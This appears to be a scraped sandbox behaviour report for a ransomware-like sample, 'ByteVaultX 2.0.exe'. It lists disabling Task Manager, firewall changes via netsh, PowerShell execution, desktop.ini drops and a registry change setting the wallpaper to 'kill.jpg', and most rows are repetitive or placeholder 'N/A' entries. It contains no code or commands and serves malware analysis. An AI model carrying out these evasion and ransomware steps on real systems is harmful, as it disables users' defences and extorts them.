N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
